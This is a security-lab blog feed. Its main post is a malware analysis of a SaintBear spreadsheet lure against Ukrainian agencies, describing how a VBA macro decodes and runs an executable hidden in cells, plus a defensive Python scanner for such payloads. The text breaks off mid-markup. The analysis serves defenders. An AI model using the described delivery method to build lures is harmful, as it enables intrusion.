NioGuard Security Lab (blog feed, last updated 2024-03-13)
NioGuard Security Lab brings together experts from industry and academia to conduct advanced anti-malware research and cybersecurity education.
Author: Alexander Adamov (http://www.blogger.com/profile/10336415028200154730)

Post: "Analysis of cyberweapons" course (published 2022-10-01)<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbPQ6czNBb5qGjNAjVPZvcsKijToTK_-9ZbaXQxR0IMNjv_GKQNFBYvPuuHhMZ-YS7pFJRRo31CuGmzvVmB-aT5mWfXBzcnJ3JPFc5xyGCOT_7jGqS04wPaxQAhEzFLWppilr0gD99NCANEadwUu_w4QEXILVSFztVX641uAee9hIDVWts2Kl_e7FJGA/s1920/Ep1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1080" data-original-width="1920" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbPQ6czNBb5qGjNAjVPZvcsKijToTK_-9ZbaXQxR0IMNjv_GKQNFBYvPuuHhMZ-YS7pFJRRo31CuGmzvVmB-aT5mWfXBzcnJ3JPFc5xyGCOT_7jGqS04wPaxQAhEzFLWppilr0gD99NCANEadwUu_w4QEXILVSFztVX641uAee9hIDVWts2Kl_e7FJGA/w640-h360/Ep1.jpg" width="640" /></a></div><br /><div>I got requests from my colleagues from the US and EU universities to come up with the "Analysis of cyberweapons" course in English. In the first video, I start the series devoted to the analysis of the Russian cyberweapons used in the Russia-Ukraine war. 
</div><div><br /></div><div>The lessons will be published on my Patreon (<a href="https://www.patreon.com/alexanderadamov">https://www.patreon.com/alexanderadamov</a>) and YouTube channel (<a href="https://www.youtube.com/c/MalwareResearchAcademy">https://www.youtube.com/c/MalwareResearchAcademy</a>)</div><div><br /></div><div>For Ukrainians:</div><div>- Telegram channel (UA): <a href="https://t.me/malwareanalysisinua">https://t.me/malwareanalysisinua</a><br />- YouTube channel (UA): <a href="https://www.youtube.com/channel/UCqquOw2m2QF_EjcyxVwIYyQ">https://www.youtube.com/channel/UCqquOw2m2QF_EjcyxVwIYyQ</a></div>
Author: Alexander Adamov (http://www.blogger.com/profile/10336415028200154730)

Post: Russian SaintBear Group Attacked Ukrainian Government Agencies Using GraphSteel & GrimPlant malware (published 2022-04-04)<p> <a href="https://blogger.googleusercontent.com/img/a/AVvXsEhvWgXYtY3JH5BdTNmom7-rvko6vkhWugLiP2eA3IuEA-i3A9Wcypf_hhdlxxDHXugQa_5zFhs9j33SauATJOjl3SX-RTTkCjPEYrCmm4HlwGmVOvv1e9c2eSO3u8jMHeccqXzHQHmc2KkfeuG_vgcH_5c46gHmVQ57XJJQoYfgIV93whgouloQoFvXvw" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img data-original-height="854" data-original-width="1362" height="402" src="https://blogger.googleusercontent.com/img/a/AVvXsEhvWgXYtY3JH5BdTNmom7-rvko6vkhWugLiP2eA3IuEA-i3A9Wcypf_hhdlxxDHXugQa_5zFhs9j33SauATJOjl3SX-RTTkCjPEYrCmm4HlwGmVOvv1e9c2eSO3u8jMHeccqXzHQHmc2KkfeuG_vgcH_5c46gHmVQ57XJJQoYfgIV93whgouloQoFvXvw=w640-h402" width="640" /></a></p><span id="docs-internal-guid-bbaf94c8-7fff-a265-4d70-5bb00f64e59d"><h2 dir="ltr" style="line-height: 1.3800000000000001; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 16pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;">Summary</span></h2><br /><ul 
style="margin-bottom: 0; margin-top: 0; padding-inline-start: 48px;"><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Name: ‘Заборгованість по зарплаті.xls’</span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Discovered in March 2022</span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Was used in attacks against Ukrainian government agencies</span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; 
white-space: pre-wrap;">Used to download GraphSteel and GrimPlant (a.k.a. Elephant) malware</span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Spreads via phishing emails as an ‘.xls’ file with a malicious Visual Basic script</span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">The ‘.xls’ file contains the encoded payload</span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">The extracted file is a PE64 executable written in Golang that downloads one file from a remote server</span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 
0pt;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">The downloaded file is a PE64 file written in Golang. It downloads the GraphSteel and GrimPlant malware.</span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">The attack has been attributed to UAC-0056, also known as SaintBear, UNC2589, and TA471, a group that has been attacking Ukraine and Georgia since 2021.</span></p></li></ul><h2 dir="ltr" style="line-height: 1.3800000000000001; margin-bottom: 6pt; margin-top: 18pt; text-align: justify;"><span style="font-family: Arial; font-size: 16pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;"><span><a name='more'></a></span>Introduction</span></h2><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">On the 28th of March 2022, the Ukrainian agency CERT-UA published an </span><a href="https://cert.gov.ua/article/38374" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">article</span></a><span 
style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> with information about new malware that was used to attack government agencies. This campaign doesn’t match any previous attacks observed since Russia invaded Ukraine. Two threats, GraphSteel and GrimPlant, linked to the <i>UAC-0056</i> group, reach the victims’ machines via email attachments. The messages contain the ‘<i>Заборгованість по зарплаті.xls</i>’ (English: ‘Salary arrears’) file, which executes a malicious Visual Basic script as soon as the victim opens it. This script extracts a PE64 file, which in turn downloads the <i>GraphSteel</i> and <i>GrimPlant</i> (a.k.a. Elephant) malware.</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhdP0FslFyKosLJHu83vSUgSaTB88ucanQ8ct9dAdJwm9-a_bzBKxoHuTEXsYaiBoinE8cU6SVGPMDySmd-hpSeGJI6dt683_mzv3opxInl9m7C5zdw-PFDR8nA-mDruuDpK9TDJfFf9ObwLlNgUSUvzhczWtGKrH2Ev8nZaapnYDhbP9w5CNjQ8zdqjA" style="margin-left: 1em; margin-right: 1em;"><img data-original-height="348" data-original-width="609" 
src="https://blogger.googleusercontent.com/img/a/AVvXsEhdP0FslFyKosLJHu83vSUgSaTB88ucanQ8ct9dAdJwm9-a_bzBKxoHuTEXsYaiBoinE8cU6SVGPMDySmd-hpSeGJI6dt683_mzv3opxInl9m7C5zdw-PFDR8nA-mDruuDpK9TDJfFf9ObwLlNgUSUvzhczWtGKrH2Ev8nZaapnYDhbP9w5CNjQ8zdqjA=s16000" /></a></div></span><h2 dir="ltr" style="line-height: 1.3800000000000001; margin-bottom: 6pt; margin-top: 18pt;"><span style="font-family: Arial; font-size: 16pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;">Technical Details</span></h2><h3 dir="ltr" style="line-height: 1.38; margin-bottom: 4pt; margin-top: 16pt;"><span style="color: #434343; font-family: Arial; font-size: 14pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;">Overview</span></h3><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">At first sight, the spreadsheet contains valid data: the amount of salary arrears in the Ukrainian regions as of ‘21.02.2022’. It contains multiple sheets that can be edited, because the file is not password-protected (a measure that is often used in malicious documents). 
</span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">We can quickly check whether the file contains any macros with the ‘olevba’ tool.</span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 517px; overflow: hidden; width: 582px;"><img height="517" src="https://lh3.googleusercontent.com/5nXfa8mLrZz2B8FCji9fG6F7obWwjh801KS-y7RTRQh3xyXmq8tItvfx2LEvP2bUmTc0z-GB3q35xeMMzZNpJdXoTXc0cKjqZzYxuhBYKqEloFNSFISFHUHNeHrWtYvCBOO_Tj64" style="margin-left: 0px; margin-top: 0px;" width="582" /></span></span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">The script contains the </span><span style="font-family: Arial; font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">‘http://ExcelVBA.ru/’ </span><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">and </span><span style="font-family: Arial; font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">‘http://ExcelVBA.ru/payments’ </span><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; 
font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">URLs, but it does not connect to them during execution: they only appear in comments.</span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 124px; overflow: hidden; width: 624px;"><img height="124" src="https://lh5.googleusercontent.com/ZSOX3GzdpjOEcW0rrLPyk1MX_CXDTTpN6LSW5X8Pe72Rr5uW3Z_4ejcEAygczKbDD3QaQ4w2pzhyJzQ9SPJFBoW0r0KWtaqfH5fVQzfM2-yMn-f9xNlPKU4I2jB-XgiWhjVckVxJ" style="margin-left: 0px; margin-top: 0px;" width="624" /></span></span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">This site is a service that sells VBA scripts.</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 349px; overflow: hidden; width: 503px;"><img height="349" src="https://lh4.googleusercontent.com/sTg0b0RD_p8rKlsneanIK55vUe7mgSpvToFWuoKUqW9WeX83ByVF2mAXIR8ie77jKHvdK9EFRF_U3glScL67nSFNk6Rx95qf89ovW2VXTUt7Hste-Wl5boNF5r_XN0Mn8NJsgvNc" style="margin-left: 0px; 
margin-top: 0px;" width="503" /></span></span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">It offers some free solutions; one of them, a file loader and file extractor for workbooks, completely matches the script that was used to unpack the malware downloader, even the comments were not deleted. This suggests that the attack was not prepared in advance but was carried out quickly.</span></p><h3 dir="ltr" style="line-height: 1.38; margin-bottom: 4pt; margin-top: 16pt;"><span style="color: #434343; font-family: Arial; font-size: 14pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;">Malicious Visual Basic script execution</span></h3><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Once a victim opens the workbook, the Visual Basic script is executed. The script is easy to obtain: just open the VBA panel in Microsoft Excel. 
One of the sheets contains an encoded payload in the ‘AB37’ range.</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 212px; overflow: hidden; width: 624px;"><img height="212" src="https://lh5.googleusercontent.com/9aQfSoO20ttmOagFardAwIURo4uFpFqJ1Le6u2iZUvDOve-B25_JwZlwzZ1bndBrNTYjMT6ZgIbb_B7Z2MPUOAETo5UhS4IqZEJPM31aUSEjVyfSiCMbTAmbn_6k4oeEZAX_-Wbk" style="margin-left: 0px; margin-top: 0px;" width="624" /></span></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">To extract the payload, the script contains a ‘SaveAs()’ function, which calls the decoding function and saves the file to the ‘%Temp%’ folder. 
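As an added example (not code from this post, from the analysed sample, or from ExcelVBA.ru), the following Python triage helper reproduces the defender's side of this step: it walks a workbook's cells column by column, joins vertically adjacent cells the way a Range2Text-style routine reads a range from top to bottom, and reports any run that decodes to a PE image. The post does not show which encoding the macro uses, so base64 and hex are assumed; the workbook contents, the hidden sheet name ‘Лист3’, the AB37:AB40 placement and the MZ/PE skeleton are constructed for the demo and stand in for the real spreadsheet.

```python
"""Triage helper for spreadsheets that hide an executable in cell ranges (added example)."""
import base64
import binascii
import math
import re
import struct
from typing import Dict, List, Optional, Tuple

MIN_LEN = 64          # runs shorter than this are treated as ordinary data
ENTROPY_FLOOR = 3.5   # digits-only data tops out at log2(10) ~ 3.32 bits/char
CELL_RE = re.compile(r"^([A-Z]+)(\d+)$")


def shannon_entropy(text: str) -> float:
    """Bits per character; encoded blobs sit well above prose or numeric data."""
    if not text:
        return 0.0
    n = len(text)
    counts: Dict[str, int] = {}
    for ch in text:
        counts[ch] = counts.get(ch, 0) + 1
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def try_decode(text: str) -> Optional[Tuple[str, bytes]]:
    """Assumption: payload is hex or base64 (the post does not show the real encoding).
    Hex is tested first because every hex string is also valid base64 alphabet."""
    compact = re.sub(r"\s+", "", text)
    if re.fullmatch(r"[0-9A-Fa-f]+", compact) and len(compact) % 2 == 0:
        return "hex", bytes.fromhex(compact)
    try:
        return "base64", base64.b64decode(compact, validate=True)
    except (binascii.Error, ValueError):
        return None


def looks_like_pe(raw: bytes) -> bool:
    """MZ header plus an e_lfanew (offset 0x3C) that points at the 'PE\\0\\0' signature."""
    if len(raw) < 0x40 or raw[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", raw, 0x3C)[0]
    return raw[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def column_runs(sheet: Dict[str, str]) -> List[Tuple[str, str]]:
    """Join vertically adjacent cells of one column (AB37, AB38, ...) into one string,
    mirroring how a Range2Text-style macro concatenates a range top to bottom."""
    by_col: Dict[str, List[Tuple[int, str]]] = {}
    for ref, value in sheet.items():
        m = CELL_RE.match(ref)
        if m and isinstance(value, str):
            by_col.setdefault(m.group(1), []).append((int(m.group(2)), value))
    runs: List[Tuple[str, str]] = []
    for col, cells in by_col.items():
        cells.sort()
        start, prev, buf = None, None, []
        for row, value in cells:
            if prev is not None and row != prev + 1:   # gap in rows closes the run
                runs.append((f"{col}{start}", "".join(buf)))
                start, buf = None, []
            if start is None:
                start = row
            buf.append(value)
            prev = row
        if buf:
            runs.append((f"{col}{start}", "".join(buf)))
    return runs


def scan_workbook(workbook: Dict[str, Dict[str, str]]) -> List[dict]:
    """Report runs that decode to a PE image (high) or to a long high-entropy blob (medium)."""
    findings: List[dict] = []
    for sheet_name, sheet in workbook.items():
        for start_ref, text in column_runs(sheet):
            if len(text) < MIN_LEN:
                continue
            decoded = try_decode(text)
            if decoded is None:
                continue
            encoding, raw = decoded
            entropy = shannon_entropy(text)
            is_pe = looks_like_pe(raw)
            if not is_pe and entropy < ENTROPY_FLOOR:
                continue
            findings.append({
                "sheet": sheet_name, "start_cell": start_ref, "encoding": encoding,
                "entropy": round(entropy, 2), "decoded_bytes": len(raw),
                "pe": is_pe, "severity": "high" if is_pe else "medium",
            })
    return findings


def _fake_pe(size: int = 512) -> bytes:
    """Constructed stand-in for the embedded Base-Update.exe: a minimal MZ/PE skeleton
    over deterministic filler bytes. NOT the real sample."""
    body = bytearray((i * 37 + 11) % 256 for i in range(size))
    body[0:2] = b"MZ"
    struct.pack_into("<I", body, 0x3C, 0x80)
    body[0x80:0x84] = b"PE\x00\x00"
    return bytes(body)


def build_sample_workbook() -> Dict[str, Dict[str, str]]:
    """Constructed workbook: a plausible salary-arrears sheet plus a hidden sheet whose
    AB37:AB40 cells carry the base64 payload (sheet names and figures are made up)."""
    blob = base64.b64encode(_fake_pe()).decode()
    chunks = [blob[i:i + 200] for i in range(0, len(blob), 200)]
    return {
        "Заборгованість": {"A1": "Область", "B1": "Сума, грн", "A2": "Київська",
                           "B2": "1250000", "A3": "Львівська", "B3": "980000"},
        "Лист3": {f"AB{37 + i}": chunk for i, chunk in enumerate(chunks)},
    }


if __name__ == "__main__":
    for finding in scan_workbook(build_sample_workbook()):
        print(finding)
```

Feeding a real workbook means replacing build_sample_workbook() with a cell dump from a spreadsheet reader; the PE check is what keeps the scan from flagging ordinary numeric columns, which also decode as hex but never carry an MZ/PE header.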
</span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 564px; overflow: hidden; width: 624px;"><img height="564" src="https://lh3.googleusercontent.com/3TIVDxZNiGlIaP8VDgY0JVoueXRzof4nGGnQynvTYM4r2Lz8GTMTIwp5g-kMKjWijm7x0f4-B_BDN_vRH7dQd1IF3udB70rRHPjC7V-7hblPQirCcZVU2OWaViLCfjkxMf_DXKFu" style="margin-left: 0px; margin-top: 0px;" width="624" /></span></span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">The decoding function ‘Range2Text’ extracts data from the range specified in the ‘ОбновлениеБазы()’ function (Russian for ‘UpdateBase’).</span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 288px; overflow: hidden; width: 624px;"><img height="288" src="https://lh5.googleusercontent.com/8bcQa0x9NhKSKHA66NBKVrSwhOeHMM4oDi8XBHQBtqEWzix_1hJo6pZhgCLgb4VnwZXm3gs-EjAqD2-Y9mPHXJrwK5XOd5T7JhtzH35GXsolvs0OIuGfaHpOz4cCXtYrIGHcHn_F" style="margin-left: 0px; margin-top: 0px;" width="624" /></span></span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">After the payload is extracted, it is executed.</span></p><br /><p 
dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 110px; overflow: hidden; width: 591px;"><img height="110" src="https://lh3.googleusercontent.com/_HilgV2BC7ETaKcReCgl8yXHpYV0m6kgLHCOzj-kQPfjbror8HQMIuLMJnd4-Pu2BW_aqBAs1xkCwjT10Nz451_6nQ1UG1y-yneK7RsrorrkSHQFmrBKeCMch2aFxVCwRIdTw3BJ" style="margin-left: 0px; margin-top: 0px;" width="591" /></span></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Besides the file extraction function, this script has functions to load files into the worksheet. The function ‘LoadFileData’ reads a file and converts its data into an array with the ‘FileToArray’ function. It then obtains the worksheet range where the data is to be saved and adjusts the size of the cells where it must be stored. 
This range can be further used in the extraction function.</span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 255px; overflow: hidden; width: 409px;"><img height="255" src="https://lh5.googleusercontent.com/G5B_nzYOV5DHFYfRIrFAi6peM6XD_mXU08eCl40e8nGwu3mo_jggIm-KKEvludYQ5tC_wqKLbsNksHrskL22dY3SxJkQw5X8pi_ixdDzW6RTs075jponW_BTJJjiYC7cLddDY-8T" style="margin-left: 0px; margin-top: 0px;" width="409" /></span></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 332px; overflow: hidden; width: 576px;"><img height="332" src="https://lh4.googleusercontent.com/_EeAkYfFe50J1pQ7kHMWBFzwKMkzgvGzaQqfTPKLvGVkw0cq9RPzzGwfFV9nCrULTWoVPEN2dbBSqUdHeQkZ1sDCifMrR4onK-JZNZlNvbsKdtCmEtQ7_q-LJH1DWxf1CQfPa3Rt" style="margin-left: 0px; margin-top: 0px;" width="576" /></span></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 92px; overflow: hidden; width: 554px;"><img height="92" src="https://lh4.googleusercontent.com/L8jyU_GZdzj4AagUQH4zRu4eP5rlT9dR0PIHG_e6WuwYsXTOpwuYeERBSxrDF6fZUbjOiqOiIQHG2RqlTR56wsuWxU-qy6m-6Ab_ml1ctX0APYOrNRdxf1rGQZTeXt8gCl_ONNWl" style="margin-left: 0px; margin-top: 0px;" width="554" /></span></span></p><p dir="ltr" style="line-height: 1.38; 
margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">The code of </span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Base-Update.exe</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"> is embedded in the hidden sheet (tab).</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><span style="border: none; display: inline-block; height: 393px; overflow: hidden; width: 624px;"><img height="393" src="https://lh5.googleusercontent.com/xKx7bWkNS6mlo53UVeRk--5n0hHTDB3hejLKibCTi7nwMGbw1Rdeg5CiHjWKFnO_3UXMzPsYAvw4n5pdyP-nU-l8yoQLUEATsXNpdx3hWp0iI2gdAu6KB7qnPwvCCY7A8Cz1_7JP" style="margin-left: 0px; margin-top: 0px;" width="624" /></span></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: 
